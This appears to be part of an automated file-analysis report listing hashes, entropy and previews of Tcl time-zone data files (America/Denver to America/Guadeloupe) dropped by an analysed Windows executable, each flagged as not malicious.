                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Denver) {.. {-9223372036854775808 -25196 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-1577898000 -25200 0 MST}.. {-1570374000 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1538924400 -21600 1 MDT}.. {-1534089600 -25200 0 MST}.. {-883587600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-757357200 -25200 0 MST}.. {-147884400 -21600 1 MDT}.. {-131558400 -25200 0 MST}.. {-116434800 -21600 1 MDT}.. {-100108800 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8430
                                                                                                                                                                                                                              Entropy (8bit):3.826664943157435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:SGiS1A5tCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:SG/K5ItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:2BBA922E9377D257CBDF6E1367BBB1A2
                                                                                                                                                                                                                              SHA1:6F33A44834E8041E78660A326A5DDAF3D7F9DC2A
                                                                                                                                                                                                                              SHA-256:84F6897B87D3978D30D35097B78C55434CE55EB65D6E488A391DFC3B3BB5A8FE
                                                                                                                                                                                                                              SHA-512:D225824945C08A3521A8288B92B26DFFA712ED3505E72DEDE4A7D1777E58DEA79ADF3F042D22624E4142DD4203BAA4DFF8EB08B7033FDF00059F6C39954EA1A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Detroit) {.. {-9223372036854775808 -19931 0 LMT}.. {-2051202469 -21600 0 CST}.. {-1724083200 -18000 0 EST}.. {-883594800 -18000 0 EST}.. {-880218000 -14400 1 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-757364400 -18000 0 EST}.. {-684349200 -14400 1 EDT}.. {-671047200 -18000 0 EST}.. {-80506740 -14400 0 EDT}.. {-68666400 -18000 0 EST}.. {-52938000 -14400 1 EDT}.. {-37216800 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {94712400 -18000 0 EST}.. {104914800 -14400 1 EDT}.. {120636000 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {157784400 -18000 0 EST}.. {167814000 -14400 0 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600 -14400 1 EDT}.. {278488800 -18000 0 EST}.. {294217200 -14400 1 EDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.86856578093135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290TL3290ppv:MByMYbpwt290Tr290b
                                                                                                                                                                                                                              MD5:398D8DBB24CEA2D174EF05F63869C94A
                                                                                                                                                                                                                              SHA1:6D0E04165952E873E6ECA33A0E54761B747F0A98
                                                                                                                                                                                                                              SHA-256:3DA98AA7D3085845779BE8ED6C93CCBDA92191F17CA67BBF779803E21DA2ABF3
                                                                                                                                                                                                                              SHA-512:2652AFD1A3F8A4B84078A964005FE10C64491EC2D47CDE57D5066D07D1D837308FD696F53B9E7B6B0E72F86F9A85128B8CBF5F302F91EADE6D840DF946DE85CD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Dominica) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8600
                                                                                                                                                                                                                              Entropy (8bit):3.8579895970456137
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:7SabOGaLm911sF7Lv/PCewtA8CzSPyDLbrcUia:7vf4lLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:EBD169ECA4D45EED28BF7B27809361BC
                                                                                                                                                                                                                              SHA1:E89C8484A29D792FB6349CFDFDD30C2FA6B78B6B
                                                                                                                                                                                                                              SHA-256:026D51D73D30A3710288F440E0C337E44E3A14D0AA2D7B6C6E53AF43FC72A90C
                                                                                                                                                                                                                              SHA-512:45C936ED7D4AF95261180547013454AAEC9FA7672B52AC6077DD99D9FEB6DDD57652FE4EC67BF81F1588384F3027A1872E0C72D9CAEB980B66D2CB6EE9B8ABB0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Edmonton) {.. {-9223372036854775808 -27232 0 LMT}.. {-1998663968 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1600614000 -21600 1 MDT}.. {-1596816000 -25200 0 MST}.. {-1567954800 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1536505200 -21600 1 MDT}.. {-1523203200 -25200 0 MST}.. {-1504450800 -21600 1 MDT}.. {-1491753600 -25200 0 MST}.. {-1473001200 -21600 1 MDT}.. {-1459699200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-715791600 -21600 1 MDT}.. {-702489600 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {136371600 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {167821200 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {23072
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1230
                                                                                                                                                                                                                              Entropy (8bit):3.7989525000422963
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5OXUepdkZss/uuD/uVK/uNC/uvFe/uxJs/u74O/u83C/uc8J/uhF8/uNHs/ulU6w:5OXCZsMw57XJh4CxUF/A6GTrtSUUhfL0
                                                                                                                                                                                                                              MD5:6766E75702D8C2D1C986DFCEFCE554F9
                                                                                                                                                                                                                              SHA1:39553F80D82BC0134FAF70C9830B96BDCBCEFF1C
                                                                                                                                                                                                                              SHA-256:48FC987E5999EA79F24797E0450FE4DAB7CF320DFAD7A47A8A1E037077EC42C9
                                                                                                                                                                                                                              SHA-512:A812D0D4254BB0B7DB7AE116652D2A8F97D22C59F2709A17D1CE435FCFB38B807A4E0ED6EA114A66897E29D85226875FA84D28B254A5D17BD1CBA95FAD8349B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Eirunepe) {.. {-9223372036854775808 -16768 0 LMT}.. {-1767208832 -18000 0 -05}.. {-1206950400 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1175367600 -14400 1 -05}.. {-1159819200 -18000 0 -05}.. {-633812400 -14400 1 -05}.. {-622062000 -18000 0 -05}.. {-602276400 -14400 1 -05}.. {-591825600 -18000 0 -05}.. {-570740400 -14400 1 -05}.. {-560203200 -18000 0 -05}.. {-539118000 -14400 1 -05}.. {-531345600 -18000 0 -05}.. {-191358000 -14400 1 -05}.. {-184190400 -18000 0 -05}.. {-155156400 -14400 1 -05}.. {-150062400 -18000 0 -05}.. {-128890800 -14400 1 -05}.. {-121118400 -18000 0 -05}.. {-99946800 -14400 1 -05}.. {-89582400 -18000 0 -05}.. {-68410800 -14400 1 -05}.. {-57960000 -18000 0 -05}.. {499755600 -14400 1 -05}.. {511243200 -18000 0 -05}.. {530600400 -14400 1 -05}.. {540273600 -18000 0 -05}.. {562136400 -14400 1 -05}.. {571204800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):279
                                                                                                                                                                                                                              Entropy (8bit):4.760311149376001
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/29078iPDm2OHvJ4YoHxHhgdrV/uF+IcmJ3/uF+ivNv:MB8629078AmdHx4YCJSB/uF+QV/uF+w9
                                                                                                                                                                                                                              MD5:CEF7277443EB6990E72C7EA7F79A122C
                                                                                                                                                                                                                              SHA1:1D3FEA364B3DC129DE3998A1455D5588EBAA6FF8
                                                                                                                                                                                                                              SHA-256:C02C6E79398553BD07BEA0BE4B7F0EBDD8BC821595909CFFB49DE4290A0D1D0F
                                                                                                                                                                                                                              SHA-512:E6FC530B2CCF010B8D38BC3F49A6859B5C68F4AB604E6305CE75FBE4FC9FF3FCD0187DEBEF6DAE652EEF9695568DBDE31F426E404CC3CC206D78183E0D919234
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/El_Salvador) {.. {-9223372036854775808 -21408 0 LMT}.. {-1546279392 -21600 0 CST}.. {547020000 -18000 1 CDT}.. {559717200 -21600 0 CST}.. {578469600 -18000 1 CDT}.. {591166800 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.836337676384058
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qfSfXHAIg20qfORL/2IAcGE7JM7QIAcGEqfBn:SlSWB9vsM3y7ekHAIgpeON/2907390eB
                                                                                                                                                                                                                              MD5:005D9C0E50291616A727CFB74A9FD37E
                                                                                                                                                                                                                              SHA1:846AE6720382B4F67B37B4256E45246C81DAF899
                                                                                                                                                                                                                              SHA-256:3E363BF82545F24CCE8CFA6EEC97BA6E1C2A7730B2A9CE6C48F784821D308A5D
                                                                                                                                                                                                                              SHA-512:452326D11D01825764BC40A77D17444D822F3AA202582233DD8B122798478FA83E3A27A02508EAC4CF0C7922AC2563742D773AA870562AE496B34FBB41FBAD63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:America/Ensenada) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4578
                                                                                                                                                                                                                              Entropy (8bit):3.8944281193962818
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5QIgsB/YRRvkGZ+R64CjSUlTG5Al5pj/A1ZFCARCeQbvb5+:6IgzR864CjSETG5sjgZkR/bvt+
                                                                                                                                                                                                                              MD5:4A4E023F635C4202018EA9E8F85B5047
                                                                                                                                                                                                                              SHA1:38E121FE2D419413E9E791B6C22BFC8D9F7554BC
                                                                                                                                                                                                                              SHA-256:AB15023807E7C7D1026C9970D190F1B405D48952464025242C2BB6C6BBB8391A
                                                                                                                                                                                                                              SHA-512:F10D21A2C841224879D1C817FC7F477DF582E1BC3603666B55199C098D51D1D5429F8C088C1083C07FC7588AE5C42A1DFBCC6B7C636AD1BE84ED657807A229E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fort_Nelson) {.. {-9223372036854775808 -29447 0 LMT}.. {-2713880953 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):231
                                                                                                                                                                                                                              Entropy (8bit):4.778858143786314
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/290HXYAp4903GK8:MByMY3GK7Kp3GKnt290Hz4903GK8
                                                                                                                                                                                                                              MD5:24C369A3091452DCA7AAEBF4F48F5289
                                                                                                                                                                                                                              SHA1:2C2174CB16F490689E6FAC17B6D18F4A0DBD2DC9
                                                                                                                                                                                                                              SHA-256:C8948616262CF6990739343ABBBD237E572DB49310099E21DD8F9E317F7D11B3
                                                                                                                                                                                                                              SHA-512:80F579572754579706B4EEA49BF30456F3231A308E0616DC430E2428A04992412773421542E4F7FE4E4C7491BA88942FA44B49E87E95A2183211AC2AB523B231
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:America/Fort_Wayne) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1423
                                                                                                                                                                                                                              Entropy (8bit):3.784027854102512
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5MeajcChlrLPsw6kSS3h5R14eH8tf3GvIkuoYVZaIBXR8nd:5rChlvEw6kSSx5H4a8tf3fkuoYVZDNRo
                                                                                                                                                                                                                              MD5:E7939C9A3F83D73B82A6DE359365EFD4
                                                                                                                                                                                                                              SHA1:06D6E257DA7C317CAFAF6C0B04567A2453CC1660
                                                                                                                                                                                                                              SHA-256:C0A836BDAF07F0376B7B0833A0AB3D52BA6E3E1D6F95E247E1AD351CD1096066
                                                                                                                                                                                                                              SHA-512:E2BEA04084489B26ADD9A768D2580C1FF7EBAC8A3EA36818F49E85FB14E01500D59D53904F5A17F4DABEF27B4CC2FC3F977EE4C125E5CE739BBE90C130ED3B07
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fortaleza) {.. {-9223372036854775808 -9240 0 LMT}.. {-1767216360 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                                              Entropy (8bit):3.8225708746657316
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:w4lTPB10KvnpNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/B51B7/BI:wKCC
                                                                                                                                                                                                                              MD5:1C8B0B85BB5578E84A4867546111F946
                                                                                                                                                                                                                              SHA1:E08A96F5B369FA53BC1F3F839EC14FF9D334F727
                                                                                                                                                                                                                              SHA-256:58C207CBD9DE7A7BB15E48A62CEA9F15DA184B945133DEE88EFF29FD8B66B29E
                                                                                                                                                                                                                              SHA-512:54CFBF208AB3E58AFB6BEC40265A452A3C4C684D7F278F51D6495FCA544652A1A5E05BC45F600911191B33C936E5D7D43A28FD2B0884AAB9F63B7AD5EFD574A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Glace_Bay) {.. {-9223372036854775808 -14388 0 LMT}.. {-2131646412 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-536443200 -14400 0 AST}.. {-526500000 -10800 1 ADT}.. {-513198000 -14400 0 AST}.. {-504907200 -14400 0 AST}.. {63086400 -14400 0 AST}.. {73461600 -10800 1 ADT}.. {89182800 -14400 0 AST}.. {104911200 -10800 1 ADT}.. {120632400 -14400 0 AST}.. {126244800 -14400 0 AST}.. {136360800 -10800 1 ADT}.. {152082000 -14400 0 AST}.. {167810400 -10800 1 ADT}.. {183531600 -14400 0 AST}.. {199260000 -10800 1 ADT}.. {215586000 -14400 0 AST}.. {230709600 -10800 1 ADT}.. {247035600 -14400 0 AST}.. {262764000 -10800 1 ADT}.. {278485200 -14400 0 AST}.. {294213600 -10800 1 ADT}.. {309934800 -14400 0 AST}.. {325663200 -10800 1 ADT}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.973070790103308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wQbSeyXHAIg20wQboAFARL/2IAcGE5GZJ4IAcGEH:SlSWB9vsM3y7lbSeSHAIgplbLFAN/291
                                                                                                                                                                                                                              MD5:8263D2B39C2EC3B38A179F8BAD5972DD
                                                                                                                                                                                                                              SHA1:18D3462F6846768E16036E860DE90FB345C93047
                                                                                                                                                                                                                              SHA-256:5FB2CFBA25CE2F49D4C3911AFF8E7E1FF84EFC2D01F5783772E88246BFBC56AC
                                                                                                                                                                                                                              SHA-512:C175CAF972459759553001D48921268E9C6268CED56021BA6339F8CE3DD032DA6180E2B82974D3DCD0DC5F21566DFDBFBE1B6CF24E5E893F2335A449452DB27F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Nuuk)]} {.. LoadTimeZoneFile America/Nuuk..}..set TZData(:America/Godthab) $TZData(:America/Nuuk)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10353
                                                                                                                                                                                                                              Entropy (8bit):3.864463676759425
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:zfSacO8f7/ewzlrfFj18KvnpNWMPm4bPJvSuYUHgA0G19OBYEi/B51B7/Bm6BTdW:zfSacOI7/V3SuYUHgAuCC
                                                                                                                                                                                                                              MD5:0D646C67105FD0525E7CCC79585CE9DF
                                                                                                                                                                                                                              SHA1:06D91FDD8FEEDC299E40079569372F97A9AC6F04
                                                                                                                                                                                                                              SHA-256:52D2478289682BF95BFB93D64D679E888C9D23C0F68DFFF7E6E34BFC44B3D892
                                                                                                                                                                                                                              SHA-512:FD672613C2B65E12425415630A2F489917EB80DDED41338C9AA7D5D3C6B54E52C516A32493593F518DACF22A91D7A9D2C96DB9C5F1BE2C3BB9842D274BDC04FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Goose_Bay) {.. {-9223372036854775808 -14500 0 LMT}.. {-2713895900 -12652 0 NST}.. {-1640982548 -12652 0 NST}.. {-1632076148 -9052 1 NDT}.. {-1615145348 -12652 0 NST}.. {-1609446548 -12652 0 NST}.. {-1096921748 -12600 0 NST}.. {-1072989000 -12600 0 NST}.. {-1061670600 -9000 1 NDT}.. {-1048973400 -12600 0 NST}.. {-1030221000 -9000 1 NDT}.. {-1017523800 -12600 0 NST}.. {-998771400 -9000 1 NDT}.. {-986074200 -12600 0 NST}.. {-966717000 -9000 1 NDT}.. {-954624600 -12600 0 NST}.. {-935267400 -9000 1 NDT}.. {-922570200 -12600 0 NST}.. {-903817800 -9000 1 NDT}.. {-891120600 -12600 0 NST}.. {-872368200 -9000 0 NWT}.. {-769395600 -9000 1 NPT}.. {-765401400 -12600 0 NST}.. {-757369800 -12600 0 NST}.. {-746044200 -9000 1 NDT}.. {-733347000 -12600 0 NST}.. {-714594600 -9000 1 NDT}.. {-701897400 -12600 0 NST}.. {-683145000 -9000 1 NDT}.. {-67044
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7522
                                                                                                                                                                                                                              Entropy (8bit):3.84007813579738
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pGStCt/cL1BRv0HY2iU7KKdFL6Aa2K4gSLf8e:pvItOx0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:A17723CE27EC99D1506C45AB1531085B
                                                                                                                                                                                                                              SHA1:A83ED7BD09514A829CC8F2EA47BA113F5DCA1090
                                                                                                                                                                                                                              SHA-256:560B39485CED4C2A0E85A66EB875331E5879104187D92CB7F05C2F635E34AC99
                                                                                                                                                                                                                              SHA-512:110D1253D6915DB046247E4FD3BA9B881146BC3896DE779215E0CC6D1DCC59958C355441955509F5D38E3A3BA166DFD0F2F277000E9E89D6551FBEA0C16974B9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Grand_Turk) {.. {-9223372036854775808 -17072 0 LMT}.. {-2524504528 -18430 0 KMT}.. {-1827687170 -18000 0 EST}.. {284014800 -18000 0 EST}.. {294217200 -14400 1 EDT}.. {309938400 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {452070000 -14400 1 EDT}.. {467791200 -18000 0 EST}.. {483519600 -14400 1 EDT}.. {499240800 -18000 0 EST}.. {514969200 -14400 1 EDT}.. {530690400 -18000 0 EST}.. {544604400 -14400 1 EDT}.. {562140000 -18000 0 EST}.. {576054000 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607503600 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638953200 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671007600 -14400 1 EDT}.. {688543200 -18000 0 EST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.892013473075135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2905Qb90ppv:MByMYbpwt290Ob90b
                                                                                                                                                                                                                              MD5:4B9ABEA103F55509550F8B42D88E84B7
                                                                                                                                                                                                                              SHA1:E3AA1BCE5E260264E74F77E59C4071B7E496AB41
                                                                                                                                                                                                                              SHA-256:EBED070E8E67C5F12FF6E03FE508BE90789F17C793DFE61237B4045B8222580F
                                                                                                                                                                                                                              SHA-512:568E375464FF264C5048CB35995945BDE1D5BCC3A108B2A4D0F8389EBF18B4C58EBB1C2122F10BA777D512504A59C7EFDF6069EABD2A5DEA3189204B7F7A6EB4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Grenada) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.9138787435596765
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2905AJLr490ppv:MByMYbpwt290qJLr490b
                                                                                                                                                                                                                              MD5:92B091A06198E233B73DF12DFCD818D5
                                                                                                                                                                                                                              SHA1:C529488D09F86755E4F22CB4F0E3013C3A1B978D
                                                                                                                                                                                                                              SHA-256:6CB1930532831D12057FCB484C60DB64A60A4F6D8195DAFD464826923116A294
                                                                                                                                                                                                                              SHA-512:55EAE03CDECAC43BEDD3AA1A32C632A46808F29FF4D97A330F818544E4D10B9E9BA909D6627C38065EB7AC8E2C395FA37797F532CCFC8AB89D4698CCDE17F985
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Guadeloupe) $TZData(:America/Puerto_Rico)..
